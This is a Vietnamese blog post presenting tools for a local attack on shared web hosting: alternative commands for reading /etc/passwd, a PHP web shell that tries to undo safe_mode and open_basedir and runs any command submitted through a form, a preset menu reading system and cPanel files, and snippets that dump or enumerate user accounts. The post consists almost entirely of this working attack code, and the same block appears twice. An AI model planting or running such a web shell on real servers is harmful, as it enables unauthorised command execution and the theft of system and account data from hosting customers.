16:05
Hướng dẫn bypass cat /etc/passwd khi local attack
Posted by
Game Mod
|
0
nhận xét
1 số lệnh thay thế lệnh này:
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwd
less /etc/passwd
Code php giúp bypass lệnh này:
<?
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Bypass</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Lệnh:</font></b><input name="baba" type="text"><input value="" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Chọn:</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat -an | grep -i listen</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Submit">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Username</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Last command:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
Script PHP khác:
<?php
echo passthru("cat /etc/passwd");
echo exec("cat /etc/passwd");
echo shell_exec("cat /etc/passwd");
?>
<?php
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}}?>
xxd /etc/passwd
rev /etc/passwd
tac /etc/passwd
more /etc/passwd
less /etc/passwd
Code php giúp bypass lệnh này:
<?
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Bypass</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Lệnh:</font></b><input name="baba" type="text"><input value="" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Chọn:</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">netstat -an | grep -i listen</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Submit">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Username</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Last command:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
Script PHP khác:
<?php
echo passthru("cat /etc/passwd");
echo exec("cat /etc/passwd");
echo shell_exec("cat /etc/passwd");
?>
<?php
for($uid=0;$uid<60000;$uid++){
$ara = @posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}}?>
0 nhận xét